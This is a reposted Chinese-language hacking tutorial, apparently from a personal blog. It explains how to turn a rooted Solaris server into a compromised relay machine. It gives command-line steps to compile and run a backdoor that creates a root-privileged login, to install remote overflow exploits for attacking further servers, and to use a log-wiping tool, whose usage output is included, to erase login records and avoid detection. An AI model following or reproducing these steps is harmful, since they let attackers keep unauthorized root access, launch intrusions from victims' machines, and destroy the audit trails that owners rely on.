轉自INTERNET

一.前言..
後門製作對於成功入侵後保持權限有很重要的意義,本文介紹簡單的實用後門的製作技術,以及如何製作一台肉雞.(哈哈哈~不要變成壞孩子哦!)
二.準備..
首先我們需要1.sunx 2.solaris遠程溢出程序 3.wipe
以上工具可以在http://www.cnredmay.com 或者http://hlc.cnroot.com找到.
三.過程..1
#id
uid=0 (root) gid=0 (root) (哈哈哈哈~~成功拿到root)
#vi sunx.c
……
……
:w
:q (保存退出vi)
#gcc -o sunx sunx.c
: command not found (昏~where is gcc)
哈哈~一般solaris主機默認沒有gcc,但是管理員通常會在/usr/local/bin/下安裝一個.當然我們也可以用whereis命令查找..
#whereis -b gcc
gcc:/usr/local/bin/gcc (哈哈~出來了哦~!)
#/usr/local/bin/gcc -o sunx sunx.c (編譯sunx.c為可執行文件)
……(過了一會兒)
#chmod 755 sunx (設置為可執行)
#sunx (有人偷看MM洗澡澡啊~~打色狼~哈哈哈)

……
這樣就安裝好一個backdoor了
你可以telnet host(ftp也可以) 用sunxdoor這個用戶名登陸(root權限)
作為肉雞一定要可以作為入侵其他服務器的跳板,所以一些常見的溢出程序一定少不了.所以下一步是安裝這些程序,我以sadxmind為例子.
# vi sad.c
……(程序內容省略)
:w
:q
#/usr/local/bin/gcc -o sad sad.c
#chmod 755 sad (這樣就可以使用sad了)
恩~我們還缺少一樣東西,哈哈~就是擦pp的東西,哈哈哈哈~~~~~~(要不然被發現就慘了,呵呵~)基本就是清除utmp&utmpx&wtmp&wtmpx這幾個文件(當
然還有其他一些log文件),我們可以利用wipe程序...
#vi wipe.c
……
#/usr/local/bin/gcc -o wipe wipe.c
#chmod 755 wipe
#wipe(看看使用參數)
USAGE: wipe [ u|w|l|a ] ...options...

UTMP editing:
Erase all usernames : wipe u [username] Erase one username on tty: wipe u [username] [tty]

WTMP editing:
Erase last entry for user : wipe w [username] Erase last entry on tty : wipe w [username] [tty]

LASTLOG editing:
Blank lastlog for user : wipe l [username] Alter lastlog entry : wipe l [username] [tty] [time] [host] Where [time] is in the format [YYMMddhhmm]

ACCT editing:
Erase acct entries on tty : wipe a [username] [tty] 好了~我要說的說完了,再見!

點閱: 52

By tony

自由軟體愛好者~喜歡不斷的思考各種問題,有新的事物都會想去學習嘗試 做實驗並熱衷研究 沒有所謂頂天的技術 只有謙虛及不斷的學習 精進專業,本站主要以分享系統及網路相關知識、資源而建立。 Github http://stnet253.github.io

發佈留言

發佈留言必須填寫的電子郵件地址不會公開。

這個網站採用 Akismet 服務減少垃圾留言。進一步了解 Akismet 如何處理網站訪客的留言資料